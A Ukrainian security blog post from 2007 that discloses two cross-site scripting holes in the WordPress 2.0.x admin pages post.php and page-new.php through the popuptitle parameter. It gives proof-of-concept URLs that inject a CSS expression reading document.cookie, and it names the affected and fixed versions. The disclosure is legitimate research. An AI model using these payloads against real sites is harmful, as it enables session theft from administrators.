« Google AdSense був уражений комп’ютерним вірусом
Добірка уразливостей »

Cross-Site Scripting в WordPress 2.0.x

23:56 22.12.2007

В листопаді, 06.11.2007, я знайшов дві Cross-Site Scripting уразливості в WordPress. Дірки в файлах post.php та page-new.php в параметрі popuptitle (вразливий код знаходиться в трьох інших файлах, що завантажуються даними скриптами).

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Це приклади для Internet Explorer. Для виконання коду в Mozilla та Firefox може бути використаний “-moz-binding”.

Вразливі версії WordPress <= 2.0.9. Версія WP 2.0.11 невразлива.


This entry was posted on 23:56 22.12.2007 and is filed under Новини сайту, Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

:mrgreen: :| :twisted: :arrow: 8O :) :? 8) :evil: :D :idea: :oops: :P :roll: ;) :cry: :o :lol: :x :( :!: :?: